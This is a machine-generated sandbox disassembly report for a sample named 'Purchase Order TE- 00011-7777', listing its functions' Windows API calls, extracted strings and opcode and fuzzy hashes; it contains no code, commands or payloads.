                      • Instruction ID: 764e3bd28951d172ff046c1f5162df1d5ec82a8dec5379d273004bc8465f93df
                      • Opcode Fuzzy Hash: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
                      • Instruction Fuzzy Hash: F8419F65508BC97DFF319B6498143A6BEA16B21344F48805BD5C7463C2EBA4DBC8CBA3
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00ACA2AA
                      • SafeArrayAllocData.OLEAUT32(?), ref: 00ACA2F5
                      • VariantInit.OLEAUT32(?), ref: 00ACA307
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ACA327
                      • VariantCopy.OLEAUT32(?,?), ref: 00ACA36A
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ACA37E
                      • VariantClear.OLEAUT32(?), ref: 00ACA393
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00ACA3A0
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3A9
                      • VariantClear.OLEAUT32(?), ref: 00ACA3BB
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3C6
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: 611cd44ed4cc0a0e004bee08d3f6af88c4718e53c7523a3d1af768d5e7c4a096
                      • Instruction ID: 5b354315057889538a1dfebf72d322530e9abfa039a84683d9d7dd166f600eec
                      • Opcode Fuzzy Hash: 611cd44ed4cc0a0e004bee08d3f6af88c4718e53c7523a3d1af768d5e7c4a096
                      • Instruction Fuzzy Hash: 10414D3590021DEFCB01DFA8D994EEEBBB9FF48304F518069E501A7361DB34AA45CBA1
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • CoInitialize.OLE32 ref: 00AEB298
                      • CoUninitialize.OLE32 ref: 00AEB2A3
                      • CoCreateInstance.OLE32(?,00000000,00000017,00B1D8FC,?), ref: 00AEB303
                      • IIDFromString.OLE32(?,?), ref: 00AEB376
                      • VariantInit.OLEAUT32(?), ref: 00AEB410
                      • VariantClear.OLEAUT32(?), ref: 00AEB471
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 834269672-1287834457
                      • Opcode ID: 2777bdbaaab398dd94abe10ad7a0de639e8a2ce090b11b8e61a8954c047e85b7
                      • Instruction ID: 8e8c95bb155cb16ad3a574b8200bc6ff475bb561e7a269b4e86a372ae3cafa7f
                      • Opcode Fuzzy Hash: 2777bdbaaab398dd94abe10ad7a0de639e8a2ce090b11b8e61a8954c047e85b7
                      • Instruction Fuzzy Hash: 20619C70214342AFC710DF55C989BAFB7E8AF89714F10481DF9859B2A1CB70EE44CBA2
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 00AE86F5
                      • inet_addr.WSOCK32(?), ref: 00AE873A
                      • gethostbyname.WSOCK32(?), ref: 00AE8746
                      • IcmpCreateFile.IPHLPAPI ref: 00AE8754
                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87C4
                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87DA
                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AE884F
                      • WSACleanup.WSOCK32 ref: 00AE8855
                      Similarity
                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                      • String ID: Ping
                      • API String ID: 1028309954-2246546115
                      • Opcode ID: 4c7e270c6fbb41a622bdf862bd28eb80f7e83a6fe046dc3c1c3a533d23b8ccf4
                      • Instruction ID: 0fa5f7a048b40ca4ed7188891a1d9e0b14622d9b873882f5fa4230e536be546f
                      • Opcode Fuzzy Hash: 4c7e270c6fbb41a622bdf862bd28eb80f7e83a6fe046dc3c1c3a533d23b8ccf4
                      • Instruction Fuzzy Hash: 3351B3316042019FDB10DF25CD85B6ABBE4EF49760F54892AF95ADB2A1DF34EC00CB51
                      APIs
                      • _memset.LIBCMT ref: 00AF9C68
                      • CreateMenu.USER32 ref: 00AF9C83
                      • SetMenu.USER32(?,00000000), ref: 00AF9C92
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9D1F
                      • IsMenu.USER32(?), ref: 00AF9D35
                      • CreatePopupMenu.USER32 ref: 00AF9D3F
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9D70
                      • DrawMenuBar.USER32 ref: 00AF9D7E
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                      • String ID: 0
                      • API String ID: 176399719-4108050209
                      • Opcode ID: 4747c9e05a74463689cd2435ce1d400d5466a5d57792674793267b66a4ad90c5
                      • Instruction ID: 4cacd6525c8e505eda44a3de60ef162a2b3ade8fb592c59d17d2e846f37098bd
                      • Opcode Fuzzy Hash: 4747c9e05a74463689cd2435ce1d400d5466a5d57792674793267b66a4ad90c5
                      • Instruction Fuzzy Hash: 6E413775A00209EFDB21EFA8D844BEA7BB6FF49314F244428FA4597351DB30A910CF61
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADEC1E
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ADEC94
                      • GetLastError.KERNEL32 ref: 00ADEC9E
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00ADED0B
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 1631212588ec888ce1bed2624ff65cb12e15bf83036cc042ae4d57070c93972d
                      • Instruction ID: b50fe1ed9d7f8d2d94a44bb2ea18a5337ad8c0ab39bb06b9b487170e7c0ae41f
                      • Opcode Fuzzy Hash: 1631212588ec888ce1bed2624ff65cb12e15bf83036cc042ae4d57070c93972d
                      • Instruction Fuzzy Hash: 46319E35A00209AFCB10EB64C989AAEB7F4EF44B10F148067F502EF3A1DA719A41CBD1
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ACC782
                      • GetDlgCtrlID.USER32 ref: 00ACC78D
                      • GetParent.USER32 ref: 00ACC7A9
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC7AC
                      • GetDlgCtrlID.USER32(?), ref: 00ACC7B5
                      • GetParent.USER32(?), ref: 00ACC7D1
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC7D4
                      Similarity
                      • API ID: MessageSend$CtrlParent$_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 313823418-1403004172
                      • Opcode ID: 615569f2439b8cf5f8dfabcd73e6959da1b8044f4061a53acb2d09b91e4d6d03
                      • Instruction ID: 63740fff61a59554118d9803afd497935f8058d54aeaad6255095481bdc7d1e0
                      • Opcode Fuzzy Hash: 615569f2439b8cf5f8dfabcd73e6959da1b8044f4061a53acb2d09b91e4d6d03
                      • Instruction Fuzzy Hash: ED21AF74A00208BFDF05EBA4CC86EFEBBB5EB46310F504119F566972E1DB785916AB20
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ACC869
                      • GetDlgCtrlID.USER32 ref: 00ACC874
                      • GetParent.USER32 ref: 00ACC890
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC893
                      • GetDlgCtrlID.USER32(?), ref: 00ACC89C
                      • GetParent.USER32(?), ref: 00ACC8B8
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC8BB
                      Similarity
                      • API ID: MessageSend$CtrlParent$_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 313823418-1403004172
                      • Opcode ID: b6aecbcea1ef1a95af38dcec690b47f1f1e11ff07800dcdfb0d1bbae987ac645
                      • Instruction ID: 02794cf67fc9f8ab2fe32ac8574ae2678dce43bf9106b468fae473ba6e743480
                      • Opcode Fuzzy Hash: b6aecbcea1ef1a95af38dcec690b47f1f1e11ff07800dcdfb0d1bbae987ac645
                      • Instruction Fuzzy Hash: CE21B071A00208BBDF01EBA4CC85EFEBBB9EF45310F504015F515E72E1DB789915AB20
                      APIs
                      • GetParent.USER32 ref: 00ACC8D9
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00ACC8EE
                      • _wcscmp.LIBCMT ref: 00ACC900
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ACC97B
                      Similarity
                      • API ID: ClassMessageNameParentSend_wcscmp
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1704125052-3381328864
                      • Opcode ID: eca7bca95153244d755dfb9b155fadbb4be794f69a0542ea068e784fc9defa5e
                      • Instruction ID: fa6ea9d3fb0c5dab7cd67da321fe6a7456cff3343933d157856e6ad381381498
                      • Opcode Fuzzy Hash: eca7bca95153244d755dfb9b155fadbb4be794f69a0542ea068e784fc9defa5e
                      • Instruction Fuzzy Hash: 9811E976648312B9FA052B30DC0AEE677ECDF07774B61005AF908E60E2FF716A026654
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00AEB777
                      • CoInitialize.OLE32(00000000), ref: 00AEB7A4
                      • CoUninitialize.OLE32 ref: 00AEB7AE
                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00AEB8AE
                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AEB9DB
                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00AEBA0F
                      • CoGetObject.OLE32(?,00000000,00B1D91C,?), ref: 00AEBA32
                      • SetErrorMode.KERNEL32(00000000), ref: 00AEBA45
                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AEBAC5
                      • VariantClear.OLEAUT32(00B1D91C), ref: 00AEBAD5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                      • String ID:
                      • API String ID: 2395222682-0
                      • Opcode ID: 1b782450dd959815367f9b13d78d3429c2298577f5bb7989e11b57dda95519c2
                      • Instruction ID: 973e4e4d758a16adfecc62a4b5e63dd55a806b1f4e013f45cf4461bb04607866
                      • Opcode Fuzzy Hash: 1b782450dd959815367f9b13d78d3429c2298577f5bb7989e11b57dda95519c2
                      • Instruction Fuzzy Hash: D4C14571618345AFC700DF69C888A6BB7E9FF88358F00495DF58A9B251DB30ED01CB62
                      APIs
                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00ADB137
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ArraySafeVartype
                      • String ID:
                      • API String ID: 1725837607-0
                      • Opcode ID: b20d60da1541824cb79a0138cf647d17c4614900f650c14f205f8958efefa3a0
                      • Instruction ID: a826a09614dfb13b65a468ef1ddd06f5d8c9b23671317aa40dd66b9ade1d659a
                      • Opcode Fuzzy Hash: b20d60da1541824cb79a0138cf647d17c4614900f650c14f205f8958efefa3a0
                      • Instruction Fuzzy Hash: 18C17E75A1121ADFDB04CF98D481BEEB7B4FF08315F21406AE616EB351D734AA81DBA0
                      APIs
                      • __swprintf.LIBCMT ref: 00AD7226
                      • __swprintf.LIBCMT ref: 00AD7233
                        • Part of subcall function 00AB234B: __woutput_l.LIBCMT ref: 00AB23A4
                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AD725D
                      • LoadResource.KERNEL32(?,00000000), ref: 00AD7269
                      • LockResource.KERNEL32(00000000), ref: 00AD7276
                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00AD7296
                      • LoadResource.KERNEL32(?,00000000), ref: 00AD72A8
                      • SizeofResource.KERNEL32(?,00000000), ref: 00AD72B7
                      • LockResource.KERNEL32(?), ref: 00AD72C3
                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AD7322
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                      • String ID:
                      • API String ID: 1433390588-0
                      • Opcode ID: d4c58d2161cb31d2105fc82053ec13e2b6acb1288e734fa717d6cffafb703012
                      • Instruction ID: f615c46d8f7db0c112ea039bf40e9c9bf05e0fddd1a598e43a21df6294e391cc
                      • Opcode Fuzzy Hash: d4c58d2161cb31d2105fc82053ec13e2b6acb1288e734fa717d6cffafb703012
                      • Instruction Fuzzy Hash: 2B31AD7190425AABCB059F61DC89AFF7BA9FF08301B048426FD12D7250EB34DA50DAA0
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00AD4A7D
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4A91
                      • GetWindowThreadProcessId.USER32(00000000), ref: 00AD4A98
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AA7
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD4AB9
                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AD2
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AE4
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B29
                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B3E
                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B49
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: b713b0c1c97c9be767c1db7a6d2cb3788cfdb68ce6b351f58260cbf31bcd4bf2
                      • Instruction ID: 4cbea96c8d089531668907c66aaad1cf9c8b22fee60108447e9d5537852866cb
                      • Opcode Fuzzy Hash: b713b0c1c97c9be767c1db7a6d2cb3788cfdb68ce6b351f58260cbf31bcd4bf2
                      • Instruction Fuzzy Hash: 6731BF75600304AFEB119F14DC89BA977E9AB58796F54801BF90AD73A0DBB4DD408F60
                      APIs
                      • GetClientRect.USER32(?), ref: 00B0EC32
                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B0EC49
                      • GetWindowDC.USER32(?), ref: 00B0EC55
                      • GetPixel.GDI32(00000000,?,?), ref: 00B0EC64
                      • ReleaseDC.USER32(?,00000000), ref: 00B0EC76
                      • GetSysColor.USER32(00000005), ref: 00B0EC94
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                      • String ID:
                      • API String ID: 272304278-0
                      • Opcode ID: 7e0e86542b3988d08e5b157ed06520203918892f767227258790dfdb6d4dc888
                      • Instruction ID: 89e0a89df93b5b87b842ad6471c8cf5e659b669d184c1c803fd764fa2875342f
                      • Opcode Fuzzy Hash: 7e0e86542b3988d08e5b157ed06520203918892f767227258790dfdb6d4dc888
                      • Instruction Fuzzy Hash: 3A212C31500205FFEB21AB74EC49BE97FB5EB05321F908665FA26A60E2DF314A51DF21
                      APIs
                      • EnumChildWindows.USER32(?,00ACDD46), ref: 00ACDC86
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ChildEnumWindows
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 3555792229-1603158881
                      • Opcode ID: e9e8fb2aa12668bb9f0888fb899c8f26c78b0dcd3cbbeafbd753677a6ab659c8
                      • Instruction ID: 030e96feb5e1517c6eebfd039d8234ec6faa02bfaacba343bc1bb156ff398c30
                      • Opcode Fuzzy Hash: e9e8fb2aa12668bb9f0888fb899c8f26c78b0dcd3cbbeafbd753677a6ab659c8
                      • Instruction Fuzzy Hash: 0D91B230A00506AACB0CDF64C581FEDFBB5FF09350F55812DE85AA7291DF30A95ADBA0
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A945F0
                      • CoUninitialize.OLE32(?,00000000), ref: 00A94695
                      • UnregisterHotKey.USER32(?), ref: 00A947BD
                      • DestroyWindow.USER32(?), ref: 00B05936
                      • FreeLibrary.KERNEL32(?), ref: 00B0599D
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B059CA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 469580280-3243417748
                      • Opcode ID: d035f590f3ebe2e38300100b1c4795d82c588c05e87a8c0b623b4bce756cbd08
                      • Instruction ID: acc57edc059813d41d159087cb91cc7e2a77c301a00aa7c25138f096735fbaab
                      • Opcode Fuzzy Hash: d035f590f3ebe2e38300100b1c4795d82c588c05e87a8c0b623b4bce756cbd08
                      • Instruction Fuzzy Hash: 32910834700602DFCB19EF64C995E69F7E4FF19704F5142A9E40AA76A2DB30AD6ACF00
                      APIs
                      • SetWindowLongW.USER32(?,000000EB), ref: 00AAC2D2
                        • Part of subcall function 00AAC697: GetClientRect.USER32(?,?), ref: 00AAC6C0
                        • Part of subcall function 00AAC697: GetWindowRect.USER32(?,?), ref: 00AAC701
                        • Part of subcall function 00AAC697: ScreenToClient.USER32(?,?), ref: 00AAC729
                      • GetDC.USER32 ref: 00B0E006
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B0E019
                      • SelectObject.GDI32(00000000,00000000), ref: 00B0E027
                      • SelectObject.GDI32(00000000,00000000), ref: 00B0E03C
                      • ReleaseDC.USER32(?,00000000), ref: 00B0E044
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B0E0CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      • Opcode ID: e9d7487a25ad2cf29befa925ce24cae0415c8d25c80e4cc02ae2de324623fc0d
                      • Instruction ID: 7e881f400028d5740e9b08c898b6fa79c205e59cd70d9eed43e0fa5bc2d97a5f
                      • Opcode Fuzzy Hash: e9d7487a25ad2cf29befa925ce24cae0415c8d25c80e4cc02ae2de324623fc0d
                      • Instruction Fuzzy Hash: 0371DD31400209DFCF219FA4C881AEA7FB5FF49360F148AA9ED665B2E6D731C845DB60
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                        • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                        • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00AFEB0E
                      • ImageList_EndDrag.COMCTL32 ref: 00AFEB14
                      • ReleaseCapture.USER32 ref: 00AFEB1A
                      • SetWindowTextW.USER32(?,00000000), ref: 00AFEBC2
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AFEBD5
                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00AFECAE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                      • API String ID: 1924731296-2107944366
                      • Opcode ID: e9faa4c7a45666bd41c0bd1c3e262163dad25b7b769039c043873264e57f1c73
                      • Instruction ID: 79b25d5cb36aa1c2f0fc1b4f76312639df006380a1c8fe4f3d670efcf49d05ae
                      • Opcode Fuzzy Hash: e9faa4c7a45666bd41c0bd1c3e262163dad25b7b769039c043873264e57f1c73
                      • Instruction Fuzzy Hash: DF51CD71204304AFD710EF64CD96FAA7BE5FB88744F40491CF6859B2E2CB709905CB62
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE4C5E
                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AE4C8A
                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AE4CCC
                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AE4CE1
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4CEE
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AE4D1E
                      • InternetCloseHandle.WININET(00000000), ref: 00AE4D65
                        • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                      • String ID:
                      • API String ID: 1241431887-3916222277
                      • Opcode ID: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                      • Instruction ID: 1405ed1dff5180b80a2dc9e57148d9c91d25687f3872d9ad38ad07ce12667bbd
                      • Opcode Fuzzy Hash: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                      • Instruction Fuzzy Hash: CA418DB1501658BFEB129F62CD89FFA77ACEF48314F10811AFA019B191DB74DD449BA0
